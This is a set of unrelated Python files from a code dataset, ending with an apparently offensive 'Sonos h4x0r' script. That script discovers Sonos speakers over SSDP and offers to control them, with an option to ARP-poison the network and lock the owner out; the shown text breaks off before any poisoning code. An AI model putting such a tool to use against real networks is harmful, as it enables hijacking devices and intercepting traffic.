        eq_([], self.redis.lrange(LIST1, 0, -1))
        eq_([], self.redis.keys("*"))
        eq_(0, self.redis.lrem("NON_EXISTENT_LIST", VAL1, 0))
    def test_brpoplpush(self):
        self.redis.rpush(LIST1, VAL1, VAL2)
        self.redis.rpush(LIST2, VAL3, VAL4)
        transfer_item = self.redis.brpoplpush(LIST1, LIST2)
        eq_(bVAL2, transfer_item)
        eq_([bVAL1], self.redis.lrange(LIST1, 0, -1))
        eq_([bVAL2, bVAL3, bVAL4],
            self.redis.lrange(LIST2, 0, -1))
        transfer_item = self.redis.brpoplpush(LIST1, LIST2)
        eq_(bVAL1, transfer_item)
        eq_([], self.redis.lrange(LIST1, 0, -1))
        eq_([bVAL1, bVAL2, bVAL3, bVAL4],
            self.redis.lrange(LIST2, 0, -1))
        timeout = 1
        with assert_elapsed_time(expected=timeout):
            eq_(None, self.redis.brpoplpush(LIST1, LIST2, timeout))
    def test_rpoplpush(self):
        self.redis.rpush(LIST1, VAL1, VAL2)
        self.redis.rpush(LIST2, VAL3, VAL4)
        transfer_item = self.redis.rpoplpush(LIST1, LIST2)
        eq_(bVAL2, transfer_item)
        eq_([bVAL1], self.redis.lrange(LIST1, 0, -1))
        eq_([bVAL2, bVAL3, bVAL4], self.redis.lrange(LIST2, 0, -1))
    def test_rpoplpush_with_empty_source(self):
        # source list is empty
        del self.redis[LIST1]
        self.redis.rpush(LIST2, VAL3, VAL4)
        transfer_item = self.redis.rpoplpush(LIST1, LIST2)
        eq_(None, transfer_item)
        eq_([], self.redis.lrange(LIST1, 0, -1))
        # nothing has been added to the destination queue
        eq_([bVAL3, bVAL4], self.redis.lrange(LIST2, 0, -1))
    def test_rpoplpush_source_with_empty_string(self):
        # source list contains empty string
        self.redis.rpush(LIST1, '')
        self.redis.rpush(LIST2, VAL3, VAL4)
        eq_(1, self.redis.llen(LIST1))
        eq_(2, self.redis.llen(LIST2))
        transfer_item = self.redis.rpoplpush(LIST1, LIST2)
        eq_(b'', transfer_item)
        eq_(0, self.redis.llen(LIST1))
        eq_(3, self.redis.llen(LIST2))
        eq_([], self.redis.lrange(LIST1, 0, -1))
        # empty string is added to the destination queue
        eq_([b'', bVAL3, bVAL4], self.redis.lrange(LIST2, 0, -1))
    def test_lrange_get_all(self):
        """Cases for returning entire list"""
        values = [bVAL4, bVAL3, bVAL2, bVAL1]
        eq_([], self.redis.lrange(LIST1, 0, 6))
        eq_([], self.redis.lrange(LIST1, 0, -1))
        self.redis.lpush(LIST1, *reversed(values))
        # Check with exact range
        eq_(values, self.redis.lrange(LIST1, 0, 3))
        # Check with negative index
        eq_(values, self.redis.lrange(LIST1, 0, -1))
        # Check with range larger than length of list
        eq_(values, self.redis.lrange(LIST1, 0, 6))
    def test_lrange_get_sublist(self):
        """Cases for returning partial list"""
        values = [bVAL4, bVAL3, bVAL2, bVAL1]
        eq_([], self.redis.lrange(LIST1, 0, 6))
        eq_([], self.redis.lrange(LIST1, 0, -1))
        self.redis.lpush(LIST1, *reversed(values))
        # Check from left end of the list
        eq_(values[:2], self.redis.lrange(LIST1, 0, 1))
        # Check from right end of the list
        eq_(values[2:4], self.redis.lrange(LIST1, 2, 3))
        # Check from right end of the list with negative range
        eq_(values[-2:], self.redis.lrange(LIST1, -2, -1))
        # Check from middle of the list
        eq_(values[1:3], self.redis.lrange(LIST1, 1, 2))
    def test_ltrim_retain_all(self):
        values = [bVAL4, bVAL3, bVAL2, bVAL1]
        self._reinitialize_list(LIST1, *values)
        self.redis.ltrim(LIST1, 0, -1)
        eq_(values, self.redis.lrange(LIST1, 0, -1))
        self.redis.ltrim(LIST1, 0, len(values) - 1)
        eq_(values, self.redis.lrange(LIST1, 0, -1))
        self.redis.ltrim(LIST1, 0, len(values) + 1)
        eq_(values, self.redis.lrange(LIST1, 0, -1))
        self.redis.ltrim(LIST1, -1 * len(values), -1)
        eq_(values, self.redis.lrange(LIST1, 0, -1))
        self.redis.ltrim(LIST1, -1 * (len(values) + 1), -1)
        eq_(values, self.redis.lrange(LIST1, 0, -1))
    def test_ltrim_remove_all(self):
        # Any start > end range empties the list.
        values = [bVAL4, bVAL3, bVAL2, bVAL1]
        self._reinitialize_list(LIST1, *values)
        self.redis.ltrim(LIST1, 2, 1)
        eq_([], self.redis.lrange(LIST1, 0, -1))
        self._reinitialize_list(LIST1, *values)
        self.redis.ltrim(LIST1, -1, -2)
        eq_([], self.redis.lrange(LIST1, 0, -1))
        self._reinitialize_list(LIST1, *values)
        self.redis.ltrim(LIST1, 2, -3)
        eq_([], self.redis.lrange(LIST1, 0, -1))
        self._reinitialize_list(LIST1, *values)
        self.redis.ltrim(LIST1, -1, 2)
        eq_([], self.redis.lrange(LIST1, 0, -1))
    def test_ltrim(self):
        values = [bVAL4, bVAL3, bVAL2, bVAL1]
        self._reinitialize_list(LIST1, *values)
        self.redis.ltrim(LIST1, 1, 2)
        eq_(values[1:3], self.redis.lrange(LIST1, 0, -1))
        self._reinitialize_list(LIST1, *values)
        self.redis.ltrim(LIST1, -3, -1)
        eq_(values[-3:], self.redis.lrange(LIST1, 0, -1))
        self._reinitialize_list(LIST1, *values)
        self.redis.ltrim(LIST1, 1, 5)
        eq_(values[1:5], self.redis.lrange(LIST1, 0, -1))
        self._reinitialize_list(LIST1, *values)
        self.redis.ltrim(LIST1, -100, 2)
        eq_(values[-100:3], self.redis.lrange(LIST1, 0, -1))
    def test_sort(self):
        values = [b'0.1', b'2', b'1.3']
        self._reinitialize_list(LIST1, *values)
        # test unsorted
        eq_(self.redis.sort(LIST1, by='nosort'), values)
        # test straightforward sort
        eq_(self.redis.sort(LIST1), [b'0.1', b'1.3', b'2'])
        # test alpha vs numeric sort
        values = [-1, -2]
        self._reinitialize_list(LIST1, *values)
        eq_(self.redis.sort(LIST1, alpha=True), [b'-1', b'-2'])
        eq_(self.redis.sort(LIST1, alpha=False), [b'-2', b'-1'])
        values = ['0.1', '2', '1.3']
        self._reinitialize_list(LIST1, *values)
        # test returning values sorted by values of other keys
        self.redis.set('by_0.1', '3')
        self.redis.set('by_2', '2')
        self.redis.set('by_1.3', '1')
        eq_(self.redis.sort(LIST1, by='by_*'), [b'1.3', b'2', b'0.1'])
        # test returning values from other keys sorted by list
        self.redis.set('get1_0.1', 'a')
        self.redis.set('get1_2', 'b')
        self.redis.set('get1_1.3', 'c')
        eq_(self.redis.sort(LIST1, get='get1_*'), [b'a', b'c', b'b'])
        # test storing result
        eq_(self.redis.sort(LIST1, get='get1_*', store='result'), 3)
        eq_(self.redis.llen('result'), 3)
        eq_(self.redis.lrange('result', 0, -1), [b'a', b'c', b'b'])
        # test desc (reverse order)
        eq_(self.redis.sort(LIST1, get='get1_*', desc=True), [b'b', b'c', b'a'])
        # test multiple gets without grouping
        self.redis.set('get2_0.1', 'x')
        self.redis.set('get2_2', 'y')
        self.redis.set('get2_1.3', 'z')
        eq_(self.redis.sort(LIST1, get=['get1_*', 'get2_*']), [b'a', b'x', b'c', b'z', b'b', b'y'])
        # test start and num apply to sorted items not final flat list of values
        eq_(self.redis.sort(LIST1, get=['get1_*', 'get2_*'], start=1, num=1), [b'c', b'z'])
        # test multiple gets with grouping
        eq_(self.redis.sort(LIST1, get=['get1_*', 'get2_*'], groups=True), [(b'a', b'x'), (b'c', b'z'), (b'b', b'y')])  # noqa
        # test start and num
        eq_(self.redis.sort(LIST1, get=['get1_*', 'get2_*'], groups=True, start=1, num=1), [(b'c', b'z')])  # noqa
        eq_(self.redis.sort(LIST1, get=['get1_*', 'get2_*'], groups=True, start=1, num=2), [(b'c', b'z'), (b'b', b'y')])  # noqa
    def test_lset(self):
        # lset on a missing key or out-of-range index must raise.
        with assert_raises(Exception):
            self.redis.lset(LIST1, 1, VAL1)
        self.redis.lpush(LIST1, VAL2)
        eq_([bVAL2], self.redis.lrange(LIST1, 0, -1))
        with assert_raises(Exception):
            self.redis.lset(LIST1, 1, VAL1)
        self.redis.lset(LIST1, 0, VAL1)
        eq_([bVAL1], self.redis.lrange(LIST1, 0, -1))
    def test_push_pop_returns_str(self):
        # All pushed values come back as the utf-8 encoding of str(value).
        key = 'l'
        values = ['5', 5, [], {}]
        for v in values:
            self.redis.rpush(key, v)
            eq_(self.redis.lpop(key), str(v).encode('utf8'))
    def _reinitialize_list(self, key, *values):
        """
        Re-initialize the list
        """
        # NOTE(review): `key` is accepted but LIST1 is used directly below;
        # all current callers pass LIST1, so behavior is unchanged.
        self.redis.delete(LIST1)
        self.redis.lpush(LIST1, *reversed(values))
| StarcoderdataPython |
11287108 | <reponame>Cryptex-github/publicbot<gh_stars>0
import discord
from discord.ext import commands
# Image Manipulation
import cv2 as cv
from urllib.request import Request, urlopen
import numpy as np
class Misc(commands.Cog):
    """Some miscellaneous commands: member/server info, avatars, DMs and an
    edge-detection image filter."""
    def __init__(self, bot):
        self.bot = bot

    def url_to_image(self, url, readFlag=cv.IMREAD_COLOR):
        """Download the image at `url` and decode it into an OpenCV array.

        A browser User-Agent is spoofed because some CDNs reject urllib's
        default agent string.
        """
        req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        resp = urlopen(req).read()
        image = np.asarray(bytearray(resp), dtype="uint8")
        image = cv.imdecode(image, readFlag)
        return image

    @commands.command()
    @commands.guild_only()  # Can't be used in DMs
    async def memberinfo(self, ctx, member: discord.Member = None):
        """Get info about a member"""
        async with ctx.typing():
            # BUGFIX: ctx.author is a property, not a callable.
            member = member or ctx.author
            # BUGFIX: the original referenced an undefined name `user` here;
            # it must be the resolved `member`.
            show_roles = ', '.join(
                [f"<@&{x.id}>" for x in sorted(member.roles, key = lambda x: x.position, reverse=True) if x.id != ctx.guild.default_role.id]
            ) if len(member.roles) > 1 else 'None'
            embed = discord.Embed(colour = member.top_role.colour.value)
            embed.set_author(name = str(member))
            embed.add_field(name = "Nickname", value = member.nick if hasattr(member, "nick") else "None", inline = True)
            embed.add_field(name = "Account created", value = member.created_at.strftime("**%d/%m/%Y** at **%H:%M**"), inline = True)
            embed.add_field(name = "Joined this server", value = member.joined_at.strftime("**%d/%m/%Y** at **%H:%M**"), inline = True)
            embed.add_field(name = "Roles", value = show_roles, inline = False)
            embed.set_thumbnail(url = member.avatar_url)
            embed.set_footer(text = f"ID: {member.id}")
            await ctx.send(embed = embed)

    # BUGFIX: decorator was `@command.command()` (undefined name `command`).
    @commands.command()
    @commands.guild_only()
    async def serverinfo(self, ctx):
        """Shows info about the server"""
        guild = ctx.guild
        guild_created_on = guild.created_at.strftime("%d/%m/%Y")
        embed = discord.Embed(title = guild.name, description = f"Created on {guild_created_on}", colour = discord.Colour.random())
        embed.add_field(name = "Members", value = len(guild.members), inline = True)
        embed.add_field(name = "Roles", value = str(len(guild.roles)), inline = True)
        embed.add_field(name = "Channels", value = (f"Text channels: {len(guild.text_channels)}\nVoice channels: {len(guild.voice_channels)}"), inline = True)
        embed.add_field(name = "Owner", value = guild.owner.name + "#" + guild.owner.discriminator, inline = True)
        embed.add_field(name = "Voice region", value = guild.region, inline = True)
        embed.add_field(name = "Nitro boosts", value = f"{guild.premium_subscription_count} (level {guild.premium_tier})", inline = True)
        embed.set_thumbnail(url = guild.icon_url if len(guild.icon_url) else ctx.author.default_avatar_url)
        embed.set_footer(text = f"ID: {guild.id}")
        await ctx.send(embed=embed)

    @commands.command()
    @commands.guild_only()
    async def avatar(self, ctx, member: discord.Member = None):
        """Get a member's avatar"""
        member = member or ctx.author
        embed = discord.Embed(title = f"Avatar for {member.name}", description = f"[Link]({member.avatar_url})", colour = member.top_role.colour.value)
        embed.set_image(url = member.avatar_url)
        await ctx.send(embed = embed)

    @commands.command()
    @commands.guild_only()
    async def dm(self, ctx, member: discord.Member, *, message: str):
        """Make the bot send a message to the specified member"""
        try:
            await member.send(message)
        except discord.Forbidden:
            await ctx.send("This user might be having their DMs closed, or it's a bot.")
            await ctx.message.add_reaction("\U0000274c")

    @commands.command()
    async def canny(self, ctx, member: discord.Member = None):
        """Run Canny edge detection on a member's avatar and post the result."""
        if member is None:
            member = ctx.message.author
        # BUGFIX: avatar_url is a discord Asset object; urllib's Request
        # needs a plain string URL.
        img = self.url_to_image(str(member.avatar_url))
        canny = cv.Canny(img, 125, 175)
        cv.imwrite("new_image.jpg", canny)
        file = discord.File('new_image.jpg')
        await ctx.send(file=file)
def setup(bot):
    # Extension entry point: called by bot.load_extension to register the cog.
    bot.add_cog(Misc(bot))
| StarcoderdataPython |
12806794 | <reponame>UTexas-PSAAP/Parla.py
import os
os.environ["OMP_NUM_THREADS"] = "24" # This is the default on my machine (Zemaitis)
import argparse
import numpy as np
import scipy.linalg
from time import perf_counter as time
def check_result(A, Q, R):
    """Verify an economy-mode QR factorization of A.

    Checks three properties: Q @ R reconstructs A, Q has orthonormal
    columns, and R is upper triangular. All comparisons use np.allclose
    to tolerate floating-point round-off.

    The identity size is derived from A's column count instead of the
    module-level NCOLS global, so the function also works when imported
    (NCOLS only exists when the script runs under __main__).
    """
    ncols = A.shape[1]
    # Check product
    is_correct_prod = np.allclose(np.matmul(Q, R), A)
    # Check orthonormal columns: Q^T Q == I
    Q_check = np.matmul(Q.transpose(), Q)
    is_ortho_Q = np.allclose(Q_check, np.identity(ncols))
    # Check upper triangular
    is_upper_R = np.allclose(R, np.triu(R))
    return is_correct_prod and is_ortho_Q and is_upper_R
if __name__ == "__main__":
    # Benchmark driver: times scipy's economy-mode QR over several runs.
    parser = argparse.ArgumentParser()
    parser.add_argument("-r", "--rows", help="Number of rows for input matrix; must be >> cols", type=int, default=5000)
    parser.add_argument("-c", "--cols", help="Number of columns for input matrix", type=int, default=100)
    parser.add_argument("-i", "--iterations", help="Number of iterations to run experiment.", type=int, default=1)
    parser.add_argument("-w", "--warmup", help="Number of warmup runs to perform before iterations.", type=int, default=0)
    parser.add_argument("-K", "--check_result", help="Checks final result on CPU", action="store_true")
    args = parser.parse_args()
    # Set global config variables
    NROWS = args.rows
    NCOLS = args.cols
    ITERS = args.iterations
    WARMUP = args.warmup
    CHECK_RESULT = args.check_result
    print('%**********************************************************************************************%\n')
    print('Config: rows=', NROWS, ' cols=', NCOLS, ' iterations=', ITERS, ' warmup=', WARMUP, ' check_result=', CHECK_RESULT, sep='', end='\n\n')
    for i in range(WARMUP + ITERS):
        # Original matrix
        A = np.random.rand(NROWS, NCOLS)
        start = time()
        Q, R = scipy.linalg.qr(A, mode='economic')
        end = time()
        # Only report timings after the warmup runs are done.
        if (i >= WARMUP):
            print(end - start)
        if CHECK_RESULT:
            if check_result(A, Q, R):
                print("\nCorrect result!\n")
            else:
                print("%***** ERROR: Incorrect final result!!! *****%")
| StarcoderdataPython |
3440250 | """A Data Management, fitting and sequence design tool designed for Protein Engineering"""
| StarcoderdataPython |
11223650 | <reponame>vincentdavis/special-sequences
from unittest import TestCase
from seqs.CardinalityMatchingAlt2 import matching, greedy_matching
# g = {0: {1: (0, 1), 2: (0, 2), 4: (0, 4)}, 1: {0: (1, 0), 3: (1, 3), 5: (1, 5)}, 2: {3: (2, 3), 0: (2, 0), 6: (2, 6)}, 3: {2: (3, 2), 1: (3, 1), 7: (3, 7)}, 4: {5: (4, 5), 6: (4, 6), 0: (4, 0)}, 5: {4: (5, 4), 7: (5, 7), 1: (5, 1)}, 6: {7: (6, 7), 4: (6, 4), 2: (6, 2)}, 7: {6: (7, 6), 5: (7, 5), 3: (7, 3)}}
# Undirected test graph given as an adjacency list: key -> list of neighbors.
g = {
    "A": ["B", "D", "I"],
    "B": ["A", "I", "C", "D"],
    "C": ["B",],
    "D": ["E", "F", "G", "H", "I", "A", "B"],
    "E": ["D",],
    "F": ["G", "D"],
    "G": ["D", "F"],
    "H": ["D",],
    "I": ["A", "B", "D",],
}
# Smoke-run both matching algorithms on the same graph; results are not
# asserted here, this script only checks they execute without raising.
matching(g, initial_matching=None)
greedy_matching(g, initial_matching=None)
print("test")
| StarcoderdataPython |
345663 | # -*- coding: utf-8 -*-
"""
Flandre Gallery Module (/flandre)
Created on Sun Sep 1 15:36:31 2019
@author: eliphat
"""
import os
import random
import tg_connection
# Local directory holding the downloaded gallery pictures.
flanpic_dir = r"D:\AndroidProjects\ScarletKindom\image-downloader\images0825"
# Aliyun OSS bucket root and per-picture URL template (filled with a filename).
oss_root = 'https://scarletkindom.oss-cn-hangzhou.aliyuncs.com'
oss_fmt = oss_root + '/flandre_collection/%s/botproc'
# Collect picture file names (basenames only — subdirectory paths are dropped,
# so internal_local_getpic assumes a flat directory; note `file` shadows the
# builtin here).
flanpics = []
for cur_root, dirs, files in os.walk(flanpic_dir):
    for file in files:
        flanpics.append(file)
def internal_local_getpic():
    """Return the local filesystem path of one randomly chosen gallery picture."""
    picked = random.choice(flanpics)
    return os.path.join(flanpic_dir, picked)
async def command_flandre(session, chat_id):
    # Handler for the /flandre command: pick a random picture and send its
    # OSS-hosted URL to the chat via the Telegram connection helper.
    photo_url = oss_fmt % random.choice(flanpics)
    await tg_connection.send_photo_by_url(session, chat_id, photo_url)
| StarcoderdataPython |
3527898 | <filename>npamp/model/integrator.py
# Copyright (C) 2012 <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import math
import numpy as np
import scipy.integrate
class NumericalIntegrator(object):
    """Base class for fixed-step numerical integration rules.

    Subclasses set `method` to a scipy.integrate routine that accepts a
    sample array and a `dx` keyword, and may override `min_count` (the
    minimum number of samples the rule requires).
    """
    min_count = 2
    # Assigned by subclasses; left as None on the abstract base.
    method = None
    def __call__(self, Y, dx):
        # Integrate samples Y taken at uniform spacing dx.
        return self.method(Y, dx=dx)
class TrapezoidIntegrator(NumericalIntegrator):
    """Composite trapezoid rule over uniformly spaced samples."""
    # SciPy renamed trapz -> trapezoid and removed trapz in SciPy 1.14;
    # prefer the new name, falling back to the old one on older SciPy.
    method = staticmethod(getattr(scipy.integrate, "trapezoid", None)
                          or scipy.integrate.trapz)
class SimpsonIntegrator(NumericalIntegrator):
    """Composite Simpson rule over uniformly spaced samples."""
    # SciPy renamed simps -> simpson and removed simps in SciPy 1.14;
    # prefer the new name, falling back to the old one on older SciPy.
    method = staticmethod(getattr(scipy.integrate, "simpson", None)
                          or scipy.integrate.simps)
class RombergIntegrator(NumericalIntegrator):
    """Romberg integration; requires 2**k + 1 uniformly spaced samples."""
    # NOTE(review): scipy.integrate.romb was deprecated (SciPy 1.12) and
    # removed in 1.15 with no renamed replacement — needs a rewrite for
    # newer SciPy versions.
    min_count = 3
    method = staticmethod(scipy.integrate.romb)
class DomainIntegrator(object):
    """Integrates sampled functions over 1D and (rho, phi) polar domains
    using one of the NumericalIntegrator rules."""
    def __init__(self, int_type):
        # int_type: a NumericalIntegrator subclass; instantiated here.
        self.num_integrator = int_type()
    def integrate(self, X, Y):
        """Integrate samples Y over the uniformly spaced abscissae X."""
        assert X.ndim == Y.ndim == 1
        assert X.shape == Y.shape
        assert len(X) >= self.num_integrator.min_count
        # Require len(X) == 2**k + 1 so the Romberg rule is always valid.
        divs_f = math.log(len(X) - 1, 2.0)
        divs = int(divs_f)
        assert divs == divs_f
        dx = (X[-1] - X[0]) / (len(X) - 1)
        I = self.num_integrator(Y, dx)
        return I
    def integrate_base(self, active_medium, input_beam, Rho, Phi, fluence):
        """Integrate a fluence sampled on a (rho, phi) polar grid over the
        medium's cross-section.

        Degenerate axes (a single rho or phi sample) are handled by
        multiplying with the axis extent instead of integrating.
        NOTE(review): assumes active_medium.radius and input_beam.rho_trunc
        are radii in the same units as Rho — confirm with callers.
        """
        assert Rho.ndim == Phi.ndim == 1
        assert fluence.shape == (Rho.shape + Phi.shape)
        # For a single-sample axis, approximate the integral as extent * value.
        integrate = lambda Y, X, xmax: self.integrate(X, Y) if len(X) > 1 else xmax * Y[0]
        radius = active_medium.radius
        if input_beam is not None:
            radius = min(radius, input_beam.rho_trunc)
        # Integrate over phi for each rho row (full circle extent 2*pi).
        phi_integrals = np.apply_along_axis(integrate, 1, fluence, Phi, 2.0*math.pi)
        # Jacobian factor rho for the polar area element (or radius/2 when
        # the rho axis is degenerate).
        phi_integrals *= Rho if len(Rho) > 1 else radius/2.0
        rho_phi_integral = integrate(phi_integrals, Rho, radius)
        return rho_phi_integral
| StarcoderdataPython |
1769729 | #/!/usr/bin/python
def writeDataToFile(filename, data, quitOnFail=False):
    # Append `data` to output/<filename> and flush to disk.
    # Python 2 code: `file` is the builtin open()-equivalent constructor.
    # NOTE(review): quitOnFail is accepted but never used in this body.
    f = file("output/"+filename, "a")
    f.write(data)
    f.flush()
    f.close()
    print "[*] Successfully saved %s" % filename
| StarcoderdataPython |
4887147 | <reponame>stephenwalker2020/solidity-things<gh_stars>0
#!/usr/bin/python3
from brownie import accounts, Contract, BoringDAOTimelock
from dotenv import load_dotenv
import os
load_dotenv()
def main():
    # Brownie script entry point: load the deployer account from the
    # `private_key` env var and deploy the timelock with a 24-hour delay,
    # with the deployer as sole proposer and executor.
    user = accounts.add(os.getenv("private_key"))
    print(user)
    timelock = BoringDAOTimelock.deploy(24*3600, [user], [user], {'from': user})
    print("timelock {}".format(timelock.address))
1791928 |
def print_event(args):
    # Simple event handler: print the received event payload (Python 2).
    print "Event: ", args
def invoke(event_manager):
    # Register print_event as a persistent handler for 'message' events
    # on the given event manager (Python 2).
    print event_manager
    event_manager.register_handler('message', print_event, persist=True)
| StarcoderdataPython |
11270577 | <reponame>SpikingNeurons/toolcraft
from .__base__ import Folder, ResultsFolder, StorageHashable
from .state import Info, Config
from .file_group import FileGroup, NpyMemMap, SHUFFLE_SEED_TYPE, \
DETERMINISTIC_SHUFFLE, NO_SHUFFLE, DO_NOT_USE, USE_ALL, \
SELECT_TYPE, NON_DETERMINISTIC_SHUFFLE, FileGroupConfig
from .file_group import DownloadFileGroup, NpyFileGroup, TempFileGroup
from .store import StoreField, StoreFieldsFolder, Mode, MODE_TYPE, \
is_store_field
from .table import FILTERS_TYPE, FILTER_TYPE
# from .tf_chkpt import TfChkptFile, TfChkptFilesManager
| StarcoderdataPython |
9663639 | import argparse
import logging
import sys
import socket
from typing import ByteString
import select
import time
import re
from urllib import request
import scapy
import getmac
from getmac import get_mac_address
from scapy.all import *
def getArgs():
    """Build and evaluate the CLI: a global -v flag plus two subcommands,
    'discover' (no arguments) and 'control' (-ip required, optional -arp,
    and a nested action subcommand: next/previous/pause/play/volume).
    Returns the parsed argparse.Namespace."""
    # Parse command-line arguments
    argsParser = argparse.ArgumentParser(
        description="Sonos h4x0r.\nEnables you to mess around " +
        "with sonos devices on the local network.")
    argsParser.add_argument(
        "-v",
        "--verbose",
        required=False,
        action="store_true",
        help="show verbose output (useful for debugging purposes)"
    )
    subparser = argsParser.add_subparsers(
        dest="command",
        title="commands",
        help="(use '{command} -h' to list command-specific arguments)")
    subparser.required = True
    # Define parser rules for different commands
    discoveryParser = subparser.add_parser(
        "discover",
        help="discover sonos devices on the local network")
    # For the control parser, we need an extra subparser that parses the action the user
    # wants to perform. Also, list the 'ip' argument as required.
    controlParser = subparser.add_parser(
        "control",
        help="control a sonos device on the network")
    controlParser.add_argument_group("required arguments").add_argument(
        "-ip",
        "--address",
        required=True,
        action="store",
        help="the address of the sonos device")
    controlParser.add_argument(
        "-arp",
        "--interface",
        required=False,
        action="store",
        help="after performing the command, perform arp poisoning on specified INTERFACE, obstructing the victim from controlling the device")
    actionParser = controlParser.add_subparsers(dest="action", title="action")
    actionParser.required = True
    actionParser.add_parser("next", help="play next song")
    actionParser.add_parser("previous", help="play previous song")
    actionParser.add_parser("pause", help="pause music")
    actionParser.add_parser("play", help="play music")
    volumeParser = actionParser.add_parser("volume", help="control the volume")
    volumeParser.add_argument_group("required argument").add_argument("level",
                                                                     action="store",
                                                                     type=int,
                                                                     help="the volume level (0 - 99) to set")
    return argsParser.parse_args()
# Initialize arguments
arguments = getArgs()
# Define a list in which we're appending the ip addresses of Sonos devices
# We end up wanting to hijack traffic from the sonos device to those clients.
# This is ONLY necessary when the user wants to perform arp poisoning.
clientList = []
# Initialize logging framework
# Set loglevel to DEBUG if verbose option is specified, otherwise INFO
# Just simply log to stdout with a simple formatter (that's sufficient - no fancy timestamps needed)
verbose = arguments.verbose
logLevel = logging.DEBUG if verbose else logging.INFO
logging.basicConfig(level=logLevel,
                    format="%(message)s",
                    handlers=[logging.StreamHandler(sys.stdout)])
# Silence scapy's own chatter; only critical messages get through.
logging.getLogger("scapy").setLevel(logging.CRITICAL)
class SonosDevice:
    """Represents a Sonos device discovered on the local network.

    Attributes:
        ip: the device's IP address as reported by the SSDP response.
        serverVersion: the value of the SSDP SERVER header.
        descriptionLocation: URL at which additional device information can
            be retrieved through an HTTP GET.
    """
    # TODO NIEK: Nice to have: retrieve that additional information and parse the xml to show some.
    def __init__(self, ip, serverVersion, descriptionLocation):
        self.ip = ip
        self.serverVersion = serverVersion
        self.descriptionLocation = descriptionLocation

    def __repr__(self):
        # Helpful when logging discovery results in verbose mode.
        return (f"SonosDevice(ip={self.ip!r}, serverVersion={self.serverVersion!r}, "
                f"descriptionLocation={self.descriptionLocation!r})")
def filterAndGetSonosDevices(dataAddrTupleList):
    """Filter Sonos devices out of raw SSDP responses.

    Args:
        dataAddrTupleList: list of (data, addr) tuples, where data is the
            raw UDP payload (bytes) and addr is an (ip, port) tuple.

    Returns:
        A list of SonosDevice objects, one for each response that mentions
        'Sonos' and carries both LOCATION and SERVER headers.
    """
    result = []
    sonosRegex = re.compile(r"Sonos", re.MULTILINE)
    locationRegex = re.compile(r"^LOCATION: (.*)\r$", re.MULTILINE)
    serverVersionRegex = re.compile(r"^SERVER: (.*)\r$", re.MULTILINE)
    # Loop over the list of (data, addr) tuples
    for entry in dataAddrTupleList:
        # The payload is bytes; decode it before matching.
        data = entry[0].decode('utf-8')
        # entry[1] is an (ip, port) tuple: throw away the port, we don't need it.
        ip, _ = entry[1]
        # BUGFIX: the original tested locationRegex here instead of
        # sonosRegex, so the 'Sonos' marker was never actually checked and
        # any SSDP responder with LOCATION/SERVER headers passed the filter.
        sonosMatchExists = bool(sonosRegex.search(data))
        locMatch = locationRegex.search(data)
        serverVersionMatch = serverVersionRegex.search(data)
        if sonosMatchExists and locMatch and serverVersionMatch:
            # The found data was about a sonos device
            result.append(SonosDevice(ip, serverVersionMatch.group(1), locMatch.group(1)))
        # Else: the data wasn't about a sonos device or we don't support it
    return result
def discovery():
    # Performs service discovery by sending a pre-formed
    # UDP packet to the multicast broadcast IP address.
    # This packet triggers service discovery by SSDP.
    # Returns a list of SonosDevices found
    multicast_addr = "192.168.127.12"
    ssdp_port = 1900
    # This packet contains the following data:
    # M-SEARCH * HTTP/1.1
    # HOST: 192.168.127.12:1900
    # MAN: "ssdp:discover"
    # MX: 1
    # ST: urn:schemas-upnp-org:device:ZonePlayer:1
    # USER-AGENT: Linux UPnP/1.0 Sonos/63.2-89270 (WDCR:Microsoft Windows
    # NT 10.0.19042)
    # X-SONOS-DEVICEID: 03c8b12a-8339-46da-bd08-f1a2b32d1475
    # X-SONOS-SESSIONSECONDS: 11
    # X-SONOS-MDPMODEL: 3
    svcDiscTrigger = bytes.fromhex("4d2d534541524348202a20485454502f" +
                                   "312e310d0a484f53543a203233392e32" +
                                   "35352e3235352e3235303a313930300d" +
                                   "0a4d414e3a2022737364703a64697363" +
                                   "6f766572220d0a4d583a20310d0a5354" +
                                   "3a2075726e3a736368656d61732d7570" +
                                   "6e702d6f72673a6465766963653a5a6f" +
                                   "6e65506c617965723a310d0a55534552" +
                                   "2d4147454e543a204c696e7578205550" +
                                   "6e502f312e3020536f6e6f732f36332e" +
                                   "322d38393237302028574443523a4d69" +
                                   "63726f736f66742057696e646f777320" +
                                   "4e542031302e302e3139303432290d0a" +
                                   "582d534f4e4f532d4445564943454944" +
                                   "3a2030336338623132612d383333392d" +
                                   "343664612d626430382d663161326233" +
                                   "3264313437350d0a582d534f4e4f532d" +
                                   "53455353494f4e5345434f4e44533a20" +
                                   "31310d0a582d534f4e4f532d4d44504d" +
                                   "4f44454c3a20330d0a0d0a")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    # Use a random free port and bind to it.
    # Then wait a couple tenths of milliseconds to allow the socket to be created;
    # we don't want send out a multicast before we're actually listening to the
    # socket as that'd mean we would miss some responses.
    sock.bind(('', 0))
    time.sleep(0.05)
    logging.debug(f"Socket (UDP) listening on {sock.getsockname()}")
    sent = sock.sendto(svcDiscTrigger, (multicast_addr, ssdp_port))
    # Wait for device responses for 3 seconds
